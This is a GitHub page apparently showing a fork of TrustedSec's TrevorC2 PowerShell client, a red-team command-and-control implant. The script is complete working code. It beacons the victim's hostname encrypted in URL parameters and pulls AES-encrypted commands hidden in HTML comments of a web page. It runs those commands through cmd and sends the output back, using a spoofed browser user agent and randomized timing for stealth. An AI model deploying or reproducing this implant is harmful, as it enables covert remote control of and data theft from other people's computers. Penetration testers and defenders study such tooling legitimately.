forked from trustedsec/trevorc2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
trevorc2_client.ps1
152 lines (145 loc) · 6.26 KB
/
trevorc2_client.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
#
# TrevorC2 - legitimate looking command and control
# Written by: Dave Kennedy @HackingDave
# Website: https://www.trustedsec.com
# GIT: https://github.com/trustedsec
# PowerShell Module by Alex Williams @offsec_ginger
#
# This is the client connection, and only an example. Refer to the readme
# to build your own client connection to the server C2 infrastructure.
# CONFIG CONSTANTS:
# Site used to communicate with (remote TrevorC2 site)
$SITE_URL = "http://127.0.0.1"
# THIS IS WHAT PATH WE WANT TO HIT FOR CODE - YOU CAN MAKE THIS ANYTHING EXAMPLE: /index.aspx (note you need to change this as well on trevorc2_server)
$ROOT_PATH_QUERY = "/"
# THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER
$SITE_PATH_QUERY = "/images"
# THIS IS THE QUERY STRING PARAMETER USED
$QUERY_STRING = "guid="
# STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
$STUB = "oldcss="
# time_interval is the time used between randomly connecting back to server, for more stealth, increase this time a lot and randomize time periods
$time_interval1 = 2
$time_interval2 = 8
# THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY
$CIPHER = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget"
# DO NOT CHANGE BELOW THIS LINE
# Using the same key derivation from TrevorC2 https://gist.github.com/ctigeek/2a56648b923d198a6e60
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
$aesManaged
}
function Create-AesKey() {
$aesManaged = Create-AesManagedObject
$hasher = New-Object System.Security.Cryptography.SHA256Managed
$toHash = [System.Text.Encoding]::UTF8.GetBytes($CIPHER)
$hashBytes = $hasher.ComputeHash($toHash)
$final = [System.Convert]::ToBase64String($hashBytes)
return $final
}
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
$fullData = $aesManaged.IV + $encryptedData
[System.Convert]::ToBase64String($fullData)
}
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
[System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}
function random_interval {
Get-Random -minimum $time_interval1 -maximum $time_interval2
}
while ($True) {
$time = random_interval
try {
$HOSTNAME = "magic_hostname=$env:computername"
$key = Create-AesKey
$SEND = Encrypt-String $key $HOSTNAME
$s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
$SEND = [System.Convert]::ToBase64String($s)
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
$r.Method = "GET"
$r.KeepAlive = $false
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
$r.Headers.Add("Accept-Encoding", "identity");
$resp = $r.GetResponse()
break
}
catch [System.Management.Automation.MethodInvocationException] {
Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
sleep $time
Continue
}
}
while ($True) {
$time = random_interval
try {
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL + $ROOT_PATH_QUERY)
$r.Method = "GET"
$r.KeepAlive = $false
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
$r.Headers.Add("Accept-Encoding", "identity");
$resp = $r.GetResponse()
$reqstream = $resp.GetResponseStream()
$sr = New-Object System.IO.StreamReader $reqstream
$ENCRYPTEDSTREAM = $sr.ReadToEnd() -split("`n") | Select-String "<!-- $STUB"
$ENCRYPTED = $ENCRYPTEDSTREAM -split("<!-- $STUB")
$ENCRYPTED = $ENCRYPTED[1] -split(" --></body>")
$key = Create-AesKey
$DECRYPTED = Decrypt-String $key $ENCRYPTED[0]
if ($DECRYPTED -eq "nothing"){
sleep $time
}
else{
if ($DECRYPTED -like $env:computername + "*"){
$DECRYPTED = $DECRYPTED -split($env:computername + "::::")
$RUN = (cmd /Q /c $DECRYPTED 2>&1 ) | Out-String
$RUN = ($env:computername + "::::" + $RUN)
$SEND = Encrypt-String $key $RUN
$s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
$SEND = [System.Convert]::ToBase64String($s)
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
$r.Method = "GET"
$r.KeepAlive = $false
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
$r.Headers.Add("Accept-Encoding", "identity");
$resp = $r.GetResponse()
sleep $time
}
}
}
catch [System.Management.Automation.MethodInvocationException] {
Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
sleep $time
Continue
}
}